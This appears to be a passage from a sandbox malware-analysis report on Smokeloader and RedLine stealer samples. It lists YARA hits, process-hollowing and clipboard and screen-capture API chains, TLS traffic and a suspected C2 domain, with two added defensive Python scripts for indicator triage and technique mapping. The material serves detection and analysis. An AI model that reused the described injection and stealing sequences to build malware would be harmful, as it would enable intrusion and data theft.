Source: unknown HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2
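Two details matter when turning the URL strings and TLS records above into indicators. String carving reads past the end of a URL in process memory, so https://whispedwoodmoodsksl.shop/apiF, /H and /n are the same /api endpoint with a stray trailing byte, not four endpoints. And the msn.com, mozilla.org and google.com strings come from explorer.exe memory and from files dropped by process 12 (JKEBFB.12.dr, GHDBAF.12.dr) that hold browser bookmark and search-engine URLs, not from the sample's own configuration. The following Python script is an added example, not part of this report or of Joe Sandbox: it parses the three line formats shown above, groups URL strings by host and originating process, deprioritises an assumed list of vendor domains, picks the most plausible endpoint per host, and collapses the paired "HTTP traffic on port" lines (each flow appears once per direction) into one client port per connection. The sample lines are copied from the report; VENDOR_DOMAINS and the endpoint heuristic are assumptions made for this example.

```python
"""Network IOC triage over Joe Sandbox-style report lines.

Added example, not part of the report or of Joe Sandbox. It parses the
"String found in binary or memory", "HTTPS traffic detected" and
"HTTP traffic on port" line formats shown above. VENDOR_DOMAINS and the
endpoint heuristic are assumptions made for this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: lines copied verbatim from the report section above.
SAMPLE_LINES = [
    "Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/H",
    "Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/api",
    "Source: 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/apiF",
    "Source: 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/n",
    "Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed",
    "Source: JKEBFB.12.dr String found in binary or memory: https://www.mozilla.org",
    "Source: unknown Network traffic detected: HTTP traffic on port 53098 -> 443",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53098",
    "Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2",
]

URL_RE = re.compile(
    r"^Source: (?P<src>[^,\s]+).*String found in binary or memory: (?P<url>https?://\S+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: (?P<sip>[\d.]+):\d+ -> [\d.]+:(?P<cport>\d+) version: TLS")
FLOW_RE = re.compile(r"HTTP traffic on port (?P<a>\d+) -> (?P<b>\d+)")

# Assumed allowlist: domains a browser profile or explorer.exe carries anyway.
# Listing a domain here only deprioritises it; it does not prove it benign.
VENDOR_DOMAINS = {
    "msn.com", "mozilla.org", "google.com", "gstatic.com", "gstatic.cn",
    "youtube.com", "digicert.com", "windows.com", "office.com", "amazon.com",
    "ecosia.org", "invisalign.com", "valvesoftware.com",
}


def is_vendor(host):
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)


def likely_endpoint(paths):
    """String carving reads past the end of a URL in memory, so "/api" also
    shows up as "/apiF". Heuristic: prefer the path that other observed paths
    extend by one or two bytes; with no such evidence take the shortest."""
    paths = set(paths)

    def extensions(p):
        return sum(1 for q in paths
                   if q != p and q.startswith(p) and len(q) - len(p) <= 2)

    return max(sorted(paths), key=lambda p: (extensions(p), -len(p)))


def extract_iocs(lines):
    hosts = defaultdict(lambda: {"paths": set(), "sources": set()})
    tls_servers = defaultdict(list)
    client_ports = set()
    for line in lines:
        m = URL_RE.match(line)
        if m:
            u = urlsplit(m["url"])
            if u.hostname:
                hosts[u.hostname]["paths"].add(u.path or "/")
                hosts[u.hostname]["sources"].add(m["src"])
            continue
        m = TLS_RE.search(line)
        if m:
            tls_servers[m["sip"]].append(int(m["cport"]))
            continue
        m = FLOW_RE.search(line)
        if m:
            # Each flow is listed once per direction; keep the ephemeral side.
            a, b = int(m["a"]), int(m["b"])
            client_ports.add(a if b == 443 else b)
    suspect = {
        h: {"paths": sorted(d["paths"]), "sources": sorted(d["sources"]),
            "endpoint": likely_endpoint(d["paths"])}
        for h, d in hosts.items() if not is_vendor(h)
    }
    return {
        "suspect_hosts": suspect,
        "vendor_hosts": sorted(h for h in hosts if is_vendor(h)),
        "tls_servers": {ip: sorted(p) for ip, p in tls_servers.items()},
        "client_ports_443": sorted(client_ports),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_LINES), indent=2))
```

On the report's own data the only non-vendor host is whispedwoodmoodsksl.shop, seen solely in 5876.exe memory with /api as the endpoint. The TLS records are keyed by server address only to count connections: 188.114.96.3 falls in a Cloudflare address range, so the domain rather than the IP is the durable indicator.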

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_0042EAB0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 7_2_0042EC90
Source: Yara match File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

System Summary

barindex
Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401658
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401620
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040162D
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401635
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401615
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401658
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower, 6_2_00403406
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401620
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401524
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040162D
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401635
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_04279B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 11_2_04279B10
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 11_2_0427A4F0
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_04279850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification, 11_2_04279850
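The API chains reported above are recognisable as ordered subsequences regardless of the housekeeping calls between them: the clipboard and screen-capture functions of 5876.exe (OpenClipboard, GetClipboardData, CloseClipboard; GetDC, CreateCompatibleBitmap, BitBlt), the NtCreateSection followed by two NtMapViewOfSection calls in xvJv1BpknZ.exe and etrtabd, and the CreateProcessA, NtUnmapViewOfSection, WriteProcessMemory, Wow64SetThreadContext, ResumeThread chain in EE6.exe, which is the canonical process-hollowing sequence. The script below is an added example, not part of the report or of Joe Sandbox: it parses "Code function" lines, normalises the A/W suffix and the Wow64 prefix, and matches each call list against a small signature table of ordered subsequences. The signature table is an assumption made for this example; the technique names are labels chosen here, and the ATT&CK ids beside them (T1055.012 process hollowing, T1115 clipboard data, T1113 screen capture, T1055 for the section-mapping primitive) are the standard ones. The sample lines are copied from the report, including one function with no API list and the etrtabd line that maps a section only once, so the classifier is seen rejecting as well as accepting.

```python
"""Map Joe Sandbox "Code function" API chains to techniques.

Added example, not part of the report or of Joe Sandbox. The signature
table is an assumption made for this example; the technique names are
labels chosen here and the ATT&CK ids beside them are the standard ones.
"""
from dataclasses import dataclass

# Constructed sample: lines copied verbatim from the report section above
# (raw strings because the paths contain backslashes).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_0042EAB0",
    r"Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 7_2_0042EC90",
    r"Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524",
    r"Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower, 6_2_00403406",
    r"Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 11_2_0427A4F0",
    r"Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00427353 7_2_00427353",
]

# Ordered API subsequences; unrelated calls may sit between the listed ones.
# Names are compared after normalise(): A/W suffix and Wow64 prefix removed.
SIGNATURES = {
    # Create a process, unmap its image, write a new one, repoint the thread
    # context, resume: process hollowing.
    "process_hollowing": ("T1055.012", [
        "CreateProcess", "NtUnmapViewOfSection", "WriteProcessMemory",
        "SetThreadContext", "ResumeThread"]),
    # A section mapped twice after creation: the local/remote view pair used
    # for mapping-based injection (the report does not name the target here).
    "section_mapping": ("T1055", [
        "NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection"]),
    "clipboard_read": ("T1115", [
        "OpenClipboard", "GetClipboardData", "CloseClipboard"]),
    # Screen DC copied into a compatible bitmap via BitBlt: screenshot.
    "screen_capture": ("T1113", [
        "GetDC", "CreateCompatibleBitmap", "BitBlt"]),
}


@dataclass
class CodeFunction:
    image: str      # file name of the process image the function was found in
    func_id: str    # Joe Sandbox id: <process index>_<phase>_<address>
    apis: list      # API names in call order, as listed by the report


def normalise(api):
    """Strip the Wow64 prefix and the ANSI/Unicode suffix so that
    Wow64SetThreadContext, CreateProcessA and CreateProcessW compare equal."""
    if api.startswith("Wow64"):
        api = api[len("Wow64"):]
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        api = api[:-1]
    return api


def parse_code_function(line):
    src, sep, rest = line.partition(" Code function: ")
    if not sep:
        return None
    path = src[len("Source: "):] if src.startswith("Source: ") else src
    image = path.replace("/", "\\").rsplit("\\", 1)[-1]
    tokens = rest.split()
    # Three tokens when APIs are listed, two when the function has none.
    apis = tokens[1].rstrip(",").split(",") if len(tokens) == 3 else []
    return CodeFunction(image, tokens[0], apis)


def contains_in_order(calls, sequence):
    """True if every name in sequence occurs in calls, in that order."""
    it = iter(calls)
    return all(name in it for name in sequence)


def classify(cf):
    calls = [normalise(a) for a in cf.apis]
    return sorted(name for name, (_, seq) in SIGNATURES.items()
                  if contains_in_order(calls, seq))


def techniques_by_image(lines):
    found = {}
    for line in lines:
        cf = parse_code_function(line)
        if cf is not None:
            found.setdefault(cf.image, set()).update(classify(cf))
    return found


if __name__ == "__main__":
    for image, techs in techniques_by_image(SAMPLE_LINES).items():
        ids = ", ".join(f"{t} ({SIGNATURES[t][0]})" for t in sorted(techs)) or "-"
        print(f"{image}: {ids}")
```

Subsequence matching rather than exact matching is deliberate: the report lists every import the function touches, and the same hollowing chain elsewhere may carry extra VirtualAllocEx or GetThreadContext calls, or use the non-Wow64 and W-suffixed names, without changing what it does.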
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00427353 7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00420880 7_2_00420880
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00404970 7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0041FD10 7_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0043B050 7_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00426174 7_2_00426174
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_004061F0 7_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00426284 7_2_00426284
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_004223B8 7_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00405440 7_2_00405440
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0040F400 7_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_004164D2 7_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00433480 7_2_00433480
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00403570 7_2_00403570
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00421580 7_2_00421580
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_004016E0 7_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_004067B0 7_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_004089A0 7_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00421C71 7_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00425CEE 7_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00440D36 7_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0043AD30 7_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00407DF0 7_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00404EF0 7_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00435EB0 7_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_00403F80 7_2_00403F80
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02121267 7_2_02121267
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0215B2B7 7_2_0215B2B7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021463DB 7_2_021463DB
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02128057 7_2_02128057
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02142067 7_2_02142067
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02156117 7_2_02156117
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02125157 7_2_02125157
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021241E7 7_2_021241E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0212F667 7_2_0212F667
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021256A7 7_2_021256A7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021536E7 7_2_021536E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02136739 7_2_02136739
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021237D7 7_2_021237D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02126457 7_2_02126457
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021464EB 7_2_021464EB
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_021475BA 7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02126A17 7_2_02126A17
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02140AE7 7_2_02140AE7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02124BD7 7_2_02124BD7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02145F55 7_2_02145F55
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0215AF97 7_2_0215AF97
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02128C07 7_2_02128C07
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427AB10 11_2_0427AB10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E8D20 12_2_6D1E8D20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D18AD50 12_2_6D18AD50
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D12ED70 12_2_6D12ED70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F6D90 12_2_6D0F6D90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D064DB0 12_2_6D064DB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1ECDC0 12_2_6D1ECDC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D126C00 12_2_6D126C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13AC30 12_2_6D13AC30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D06AC60 12_2_6D06AC60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D05ECC0 12_2_6D05ECC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0BECD0 12_2_6D0BECD0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D066F10 12_2_6D066F10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A0F20 12_2_6D1A0F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0CEF40 12_2_6D0CEF40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D122F70 12_2_6D122F70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A8FB0 12_2_6D1A8FB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D06EFB0 12_2_6D06EFB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D13EFF0 12_2_6D13EFF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D060FE0 12_2_6D060FE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D140E20 12_2_6D140E20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0FEE70 12_2_6D0FEE70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E6E90 12_2_6D0E6E90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D06AEC0 12_2_6D06AEC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D100EC0 12_2_6D100EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0B6900 12_2_6D0B6900
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D098960 12_2_6D098960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1209B0 12_2_6D1209B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0F09A0 12_2_6D0F09A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D11A9A0 12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D17C9E0 12_2_6D17C9E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0949F0 12_2_6D0949F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0B0820 12_2_6D0B0820
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0EA820 12_2_6D0EA820
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D134840 12_2_6D134840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1668E0 12_2_6D1668E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D100BA0 12_2_6D100BA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D166BE0 12_2_6D166BE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D10EA00 12_2_6D10EA00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D118A30 12_2_6D118A30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0DCA70 12_2_6D0DCA70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0DEA80 12_2_6D0DEA80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A8550 12_2_6D1A8550
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0B8540 12_2_6D0B8540
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D164540 12_2_6D164540
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D100570 12_2_6D100570
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C2560 12_2_6D0C2560
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0545B0 12_2_6D0545B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D12A5E0 12_2_6D12A5E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0EE5F0 12_2_6D0EE5F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C4420 12_2_6D0C4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0EA430 12_2_6D0EA430
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D078460 12_2_6D078460
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D18A480 12_2_6D18A480
